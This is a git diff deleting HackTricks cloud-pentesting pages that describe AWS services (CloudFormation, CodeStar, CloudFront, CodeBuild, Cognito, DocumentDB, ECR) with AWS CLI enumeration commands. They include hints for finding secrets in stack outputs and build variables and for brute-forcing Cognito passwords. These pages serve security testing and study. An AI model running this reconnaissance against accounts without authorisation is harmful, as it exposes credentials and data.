- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Types of services - -### Container services - -Services that fall under container services have the following characteristics: - -* The service itself runs on **separate infrastructure instances**, such as EC2. -* **AWS** is responsible for **managing the operating system and the platform**. -* A managed service is provided by AWS, which is typically the service itself for the **actual application which are seen as containers**. -* As a user of these container services, you have a number of management and security responsibilities, including **managing network access security, such as network access control list rules and any firewalls**. -* Also, platform-level identity and access management where it exists. -* **Examples** of AWS container services include Relational Database Service, Elastic Mapreduce, and Elastic Beanstalk. - -### Abstract Services - -* These services are **removed, abstracted, from the platform or management layer which cloud applications are built on**. -* The services are accessed via endpoints using AWS application programming interfaces, APIs. -* The **underlying infrastructure, operating system, and platform is managed by AWS**. -* The abstracted services provide a multi-tenancy platform on which the underlying infrastructure is shared. -* **Data is isolated via security mechanisms**. -* Abstract services have a strong integration with IAM, and **examples** of abstract services include S3, DynamoDB, Amazon Glacier, and SQS. - -## Services Enumeration - -**The pages of this section are ordered by AWS service. In there you will be able to find information about the service (how it works and capabilities) and that will allow you to escalate privileges.** - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md b/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md deleted file mode 100644 index a4e9343ab..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md +++ /dev/null @@ -1,101 +0,0 @@ -# AWS - CloudFormation & Codestar Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## CloudFormation - -AWS CloudFormation is a service designed to **streamline the management of AWS resources**. It enables users to focus more on their applications running in AWS by **minimizing the time spent on resource management**. The core feature of this service is the **template**—a descriptive model of the desired AWS resources. Once this template is provided, CloudFormation is responsible for the **provisioning and configuration** of the specified resources. This automation facilitates a more efficient and error-free management of AWS infrastructure. - -### Enumeration - -```bash -# Stacks -aws cloudformation list-stacks -aws cloudformation describe-stacks # You could find sensitive information here -aws cloudformation list-stack-resources --stack-name -aws cloudformation get-template --stack-name cloudformationStack -aws cloudformation describe-stack-events --stack-name cloudformationStack - -## Show params and outputs -aws cloudformation describe-stacks | jq ".Stacks[] | .StackId, .StackName, .Parameters, .Outputs" - -# Export -aws cloudformation list-exports -aws cloudformation list-imports --export-name - -# Stack Sets -aws cloudformation list-stack-sets -aws cloudformation describe-stack-set --stack-set-name -aws cloudformation list-stack-instances --stack-set-name -aws cloudformation list-stack-set-operations --stack-set-name -aws cloudformation list-stack-set-operation-results --stack-set-name --operation-id -``` - -### Privesc - -In the following page you can check how to **abuse cloudformation permissions to escalate privileges**: - -{% content-ref url="../aws-privilege-escalation/aws-cloudformation-privesc/" %} -[aws-cloudformation-privesc](../aws-privilege-escalation/aws-cloudformation-privesc/) -{% endcontent-ref %} - -### Post-Exploitation - -Check for **secrets** or sensitive information in the **template, parameters & output** of each CloudFormation - -## Codestar - -AWS CodeStar is a service for creating, managing, and working with software development projects on AWS. You can quickly develop, build, and deploy applications on AWS with an AWS CodeStar project. An AWS CodeStar project creates and **integrates AWS services** for your project development toolchain. Depending on your choice of AWS CodeStar project template, that toolchain might include source control, build, deployment, virtual servers or serverless resources, and more. AWS CodeStar also **manages the permissions required for project users** (called team members). - -### Enumeration - -```bash -# Get projects information -aws codestar list-projects -aws codestar describe-project --id -aws codestar list-resources --project-id -aws codestar list-team-members --project-id - - aws codestar list-user-profiles - aws codestar describe-user-profile --user-arn -``` - -### Privesc - -In the following page you can check how to **abuse codestar permissions to escalate privileges**: - -{% content-ref url="../aws-privilege-escalation/aws-codestar-privesc/" %} -[aws-codestar-privesc](../aws-privilege-escalation/aws-codestar-privesc/) -{% endcontent-ref %} - -## References - -* [https://docs.aws.amazon.com/cloudformation/](https://docs.aws.amazon.com/cloudformation/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md b/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md deleted file mode 100644 index d80ef3c21..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md +++ /dev/null @@ -1,70 +0,0 @@ -# AWS - CloudFront Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## CloudFront - -CloudFront is AWS's **content delivery network that speeds up distribution** of your static and dynamic content through its worldwide network of edge locations. When you use a request content that you're hosting through Amazon CloudFront, the request is routed to the closest edge location which provides it the lowest latency to deliver the best performance. When **CloudFront access logs** are enabled you can record the request from each user requesting access to your website and distribution. As with S3 access logs, these logs are also **stored on Amazon S3 for durable and persistent storage**. There are no charges for enabling logging itself, however, as the logs are stored in S3 you will be stored for the storage used by S3. - -The log files capture data over a period of time and depending on the amount of requests that are received by Amazon CloudFront for that distribution will depend on the amount of log fils that are generated. It's important to know that these log files are not created or written to on S3. S3 is simply where they are delivered to once the log file is full. **Amazon CloudFront retains these logs until they are ready to be delivered to S3**. Again, depending on the size of these log files this delivery can take **between one and 24 hours**. - -**By default cookie logging is disabled** but you can enable it. - -### Functions - -You can create functions in CloudFront. These functions will have its **endpoint in cloudfront** defined and will run a declared **NodeJS code**. This code will run inside a **sandbox** in a machine running under an AWS managed machine (you would need a sandbox bypass to manage to escape to the underlaying OS). - -As the functions aren't run in the users AWS account. no IAM role is attached so no direct privesc is possible abusing this feature. - -### Enumeration - -```bash -aws cloudfront list-distributions -aws cloudfront get-distribution --id # Just get 1 -aws cloudfront get-distribution-config --id - -aws cloudfront list-functions -aws cloudfront get-function --name TestFunction function_code.js - -aws cloudfront list-distributions | jq ".DistributionList.Items[] | .Id, .Origins.Items[].Id, .Origins.Items[].DomainName, .AliasICPRecordals[].CNAME" -``` - -## Unauthenticated Access - -{% content-ref url="../aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md" %} -[aws-cloudfront-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md) -{% endcontent-ref %} - -## Post Exploitation - -{% content-ref url="../aws-post-exploitation/aws-cloudfront-post-exploitation.md" %} -[aws-cloudfront-post-exploitation.md](../aws-post-exploitation/aws-cloudfront-post-exploitation.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md b/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md deleted file mode 100644 index 7798cea35..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md +++ /dev/null @@ -1,102 +0,0 @@ -# AWS - Codebuild Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## CodeBuild - -AWS **CodeBuild** is recognized as a **fully managed continuous integration service**. The primary purpose of this service is to automate the sequence of compiling source code, executing tests, and packaging the software for deployment purposes. The predominant benefit offered by CodeBuild lies in its ability to alleviate the need for users to provision, manage, and scale their build servers. This convenience is because the service itself manages these tasks. Essential features of AWS CodeBuild encompass: - -1. **Managed Service**: CodeBuild manages and scales the build servers, freeing users from server maintenance. -2. **Continuous Integration**: It integrates with the development and deployment workflow, automating the build and test phases of the software release process. -3. **Package Production**: After the build and test phases, it prepares the software packages, making them ready for deployment. - -AWS CodeBuild seamlessly integrates with other AWS services, enhancing the CI/CD (Continuous Integration/Continuous Deployment) pipeline's efficiency and reliability. - -### **Github/Gitlab/Bitbucket Credentials** - -#### **Default source credentials** - -This is the legacy option where it's possible to configure some **access** (like a Github token or app) that will be **shared across codebuild projects** so all the projects can use this configured set of credentials. - -The stored credentials (tokens, passwords...) are **managed by codebuild** and there isn't any public way to retrieve them from AWS APIs. - -#### Custom source credential - -Depending on the repository platform (Github, Gitlab and Bitbucket) different options are provided. But in general, any option that requires to **store a token or a password will store it as a secret in the secrets manager**. - -This allows **different codebuild projects to use different configured accesses** to the providers instead of just using the configured default one. - -### Enumeration - -```bash -# List external repo creds (such as github tokens) -## It doesn't return the token but just the ARN where it's located -aws codebuild list-source-credentials - -# Projects -aws codebuild list-shared-projects -aws codebuild list-projects -aws codebuild batch-get-projects --names # Check for creds in env vars - -# Builds -aws codebuild list-builds -aws codebuild list-builds-for-project --project-name -aws codebuild list-build-batches -aws codebuild list-build-batches-for-project --project-name - -# Reports -aws codebuild list-reports -aws codebuild describe-test-cases --report-arn -``` - -### Privesc - -In the following page, you can check how to **abuse codebuild permissions to escalate privileges**: - -{% content-ref url="../aws-privilege-escalation/aws-codebuild-privesc.md" %} -[aws-codebuild-privesc.md](../aws-privilege-escalation/aws-codebuild-privesc.md) -{% endcontent-ref %} - -### Post Exploitation - -{% content-ref url="../aws-post-exploitation/aws-codebuild-post-exploitation/" %} -[aws-codebuild-post-exploitation](../aws-post-exploitation/aws-codebuild-post-exploitation/) -{% endcontent-ref %} - -### Unauthenticated Access - -{% content-ref url="../aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md" %} -[aws-codebuild-unauthenticated-access.md](../aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md) -{% endcontent-ref %} - -## References - -* [https://docs.aws.amazon.com/managedservices/latest/userguide/code-build.html](https://docs.aws.amazon.com/managedservices/latest/userguide/code-build.html) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md b/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md deleted file mode 100644 index 1701910c0..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md +++ /dev/null @@ -1,130 +0,0 @@ -# AWS - Cognito Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cognito - -Amazon Cognito is utilized for **authentication, authorization, and user management** in web and mobile applications. It allows users the flexibility to sign in either directly using a **user name and password** or indirectly through a **third party**, including Facebook, Amazon, Google, or Apple. - -Central to Amazon Cognito are two primary components: - -1. **User Pools**: These are directories designed for your app users, offering **sign-up and sign-in functionalities**. -2. **Identity Pools**: These pools are instrumental in **authorizing users to access different AWS services**. They are not directly involved in the sign-in or sign-up process but are crucial for resource access post-authentication. - -### **User pools** - -To learn what is a **Cognito User Pool check**: - -{% content-ref url="cognito-user-pools.md" %} -[cognito-user-pools.md](cognito-user-pools.md) -{% endcontent-ref %} - -### **Identity pools** - -The learn what is a **Cognito Identity Pool check**: - -{% content-ref url="cognito-identity-pools.md" %} -[cognito-identity-pools.md](cognito-identity-pools.md) -{% endcontent-ref %} - -## Enumeration - -{% code overflow="wrap" %} -```bash -# List Identity Pools -aws cognito-identity list-identity-pools --max-results 60 -aws cognito-identity describe-identity-pool --identity-pool-id "eu-west-2:38b294756-2578-8246-9074-5367fc9f5367" -aws cognito-identity list-identities --identity-pool-id --max-results 60 -aws cognito-identity get-identity-pool-roles --identity-pool-id - -# Identities Datasets -## Get dataset of identity id (inside identity pool) -aws cognito-sync list-datasets --identity-pool-id --identity-id -## Get info of the dataset -aws cognito-sync describe-dataset --identity-pool-id --identity-id --dataset-name -## Get dataset records -aws cognito-sync list-records --identity-pool-id --identity-id --dataset-name - -# User Pools -## Get pools -aws cognito-idp list-user-pools --max-results 60 - -## Get users -aws cognito-idp list-users --user-pool-id - -## Get groups -aws cognito-idp list-groups --user-pool-id - -## Get users in a group -aws cognito-idp list-users-in-group --user-pool-id --group-name - -## List App IDs of a user pool -aws cognito-idp list-user-pool-clients --user-pool-id - -## List configured identity providers for a user pool -aws cognito-idp list-identity-providers --user-pool-id - -## List user import jobs -aws cognito-idp list-user-import-jobs --user-pool-id --max-results 60 - -## Get MFA config of a user pool -aws cognito-idp get-user-pool-mfa-config --user-pool-id - -## Get risk configuration -aws cognito-idp describe-risk-configuration --user-pool-id -``` -{% endcode %} - -### Identity Pools - Unauthenticated Enumeration - -Just **knowing the Identity Pool ID** you might be able **get credentials of the role associated to unauthenticated** users (if any). [**Check how here**](cognito-identity-pools.md#accessing-iam-roles). - -### User Pools - Unauthenticated Enumeration - -Even if you **don't know a valid username** inside Cognito, you might be able to **enumerate** valid **usernames**, **BF** the **passwords** of even **register a new user** just **knowing the App client ID** (which is usually found in source code). [**Check how here**](cognito-user-pools.md#registration)**.** - -## Privesc - -{% content-ref url="../../aws-privilege-escalation/aws-cognito-privesc.md" %} -[aws-cognito-privesc.md](../../aws-privilege-escalation/aws-cognito-privesc.md) -{% endcontent-ref %} - -## Unauthenticated Access - -{% content-ref url="../../aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md" %} -[aws-cognito-unauthenticated-enum.md](../../aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md) -{% endcontent-ref %} - -## Persistence - -{% content-ref url="../../aws-persistence/aws-cognito-persistence.md" %} -[aws-cognito-persistence.md](../../aws-persistence/aws-cognito-persistence.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md b/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md deleted file mode 100644 index b19805d71..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md +++ /dev/null @@ -1,66 +0,0 @@ -# AWS - DocumentDB Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## DocumentDB - -Amazon DocumentDB, offering compatibility with MongoDB, is presented as a **fast, reliable, and fully managed database service**. Designed for simplicity in deployment, operation, and scalability, it allows the **seamless migration and operation of MongoDB-compatible databases in the cloud**. Users can leverage this service to execute their existing application code and utilize familiar drivers and tools, ensuring a smooth transition and operation akin to working with MongoDB. - -### Enumeration - -```bash -aws docdb describe-db-clusters # Get username from "MasterUsername", get also the endpoint from "Endpoint" -aws docdb describe-db-instances #Get hostnames from here - -# Parameter groups -aws docdb describe-db-cluster-parameter-groups -aws docdb describe-db-cluster-parameters --db-cluster-parameter-group-name - -# Snapshots -aws docdb describe-db-cluster-snapshots -aws --region us-east-1 --profile ad docdb describe-db-cluster-snapshot-attributes --db-cluster-snapshot-identifier -``` - -### NoSQL Injection - -As DocumentDB is a MongoDB compatible database, you can imagine it's also vulnerable to common NoSQL injection attacks: - -{% embed url="https://book.hacktricks.xyz/pentesting-web/nosql-injection" %} - -### DocumentDB - -{% content-ref url="../aws-unauthenticated-enum-access/aws-documentdb-enum.md" %} -[aws-documentdb-enum.md](../aws-unauthenticated-enum-access/aws-documentdb-enum.md) -{% endcontent-ref %} - -## References - -* [https://aws.amazon.com/blogs/database/analyze-amazon-documentdb-workloads-with-performance-insights/](https://aws.amazon.com/blogs/database/analyze-amazon-documentdb-workloads-with-performance-insights/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md b/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md deleted file mode 100644 index f33f7488f..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md +++ /dev/null @@ -1,131 +0,0 @@ -# AWS - ECR Enum - -## AWS - ECR Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### ECR - -#### Basic Information - -Amazon **Elastic Container Registry** (Amazon ECR) is a **managed container image registry service**. It is designed to provide an environment where customers can interact with their container images using well-known interfaces. Specifically, the use of the Docker CLI or any preferred client is supported, enabling activities such as pushing, pulling, and managing container images. - -ECR is compose by 2 types of objects: **Registries** and **Repositories**. - -**Registries** - -Every AWS account has 2 registries: **Private** & **Public**. - -1. **Private Registries**: - -* **Private by default**: The container images stored in an Amazon ECR private registry are **only accessible to authorized users** within your AWS account or to those who have been granted permission. - * The URI of a **private repository** follows the format `.dkr.ecr..amazonaws.com/` -* **Access control**: You can **control access** to your private container images using **IAM policies**, and you can configure fine-grained permissions based on users or roles. -* **Integration with AWS services**: Amazon ECR private registries can be easily **integrated with other AWS services**, such as EKS, ECS... -* **Other private registry options**: - * The Tag immutability column lists its status, if tag immutability is enabled it will **prevent** image **pushes** with **pre-existing tags** from overwriting the images. - * The **Encryption type** column lists the encryption properties of the repository, it shows the default encryption types such as AES-256, or has **KMS** enabled encryptions. - * The **Pull through cache** column lists its status, if Pull through cache status is Active it will cache **repositories in an external public repository into your private repository**. - * Specific **IAM policies** can be configured to grant different **permissions**. - * The **scanning configuration** allows to scan for vulnerabilities in the images stored inside the repo. - -2. **Public Registries**: - -* **Public accessibility**: Container images stored in an ECR Public registry are **accessible to anyone on the internet without authentication.** - * The URI of a **public repository** is like `public.ecr.aws//`. Although the `` part can be changed by the admin to another string easier to remember. - -**Repositories** - -These are the **images** that in the **private registry** or to the **public** one. - -{% hint style="info" %} -Note that in order to upload an image to a repository, the **ECR repository need to have the same name as the image**. -{% endhint %} - -#### Registry & Repository Policies - -**Registries & repositories** also have **policies that can be used to grant permissions to other principals/accounts**. For example, in the following repository policy image you can see how any user from the whole organization will be able to access the image: - -
- -#### Enumeration - -{% code overflow="wrap" %} -```bash -# Get repos -aws ecr describe-repositories -aws ecr describe-registry - -# Get image metadata -aws ecr list-images --repository-name -aws ecr describe-images --repository-name -aws ecr describe-image-replication-status --repository-name --image-id -aws ecr describe-image-scan-findings --repository-name --image-id -aws ecr describe-pull-through-cache-rules --repository-name --image-id - -# Get public repositories -aws ecr-public describe-repositories - -# Get policies -aws ecr get-registry-policy -aws ecr get-repository-policy --repository-name -``` -{% endcode %} - -#### Unauthenticated Enum - -{% content-ref url="../aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md" %} -[aws-ecr-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md) -{% endcontent-ref %} - -#### Privesc - -In the following page you can check how to **abuse ECR permissions to escalate privileges**: - -{% content-ref url="../aws-privilege-escalation/aws-ecr-privesc.md" %} -[aws-ecr-privesc.md](../aws-privilege-escalation/aws-ecr-privesc.md) -{% endcontent-ref %} - -#### Post Exploitation - -{% content-ref url="../aws-post-exploitation/aws-ecr-post-exploitation.md" %} -[aws-ecr-post-exploitation.md](../aws-post-exploitation/aws-ecr-post-exploitation.md) -{% endcontent-ref %} - -#### Persistence - -{% content-ref url="../aws-persistence/aws-ecr-persistence.md" %} -[aws-ecr-persistence.md](../aws-persistence/aws-ecr-persistence.md) -{% endcontent-ref %} - -## References - -* [https://docs.aws.amazon.com/AmazonECR/latest/APIReference/Welcome.html](https://docs.aws.amazon.com/AmazonECR/latest/APIReference/Welcome.html) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md b/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md deleted file mode 100644 index 198b4e856..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md +++ /dev/null @@ -1,108 +0,0 @@ -# AWS - ECS Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
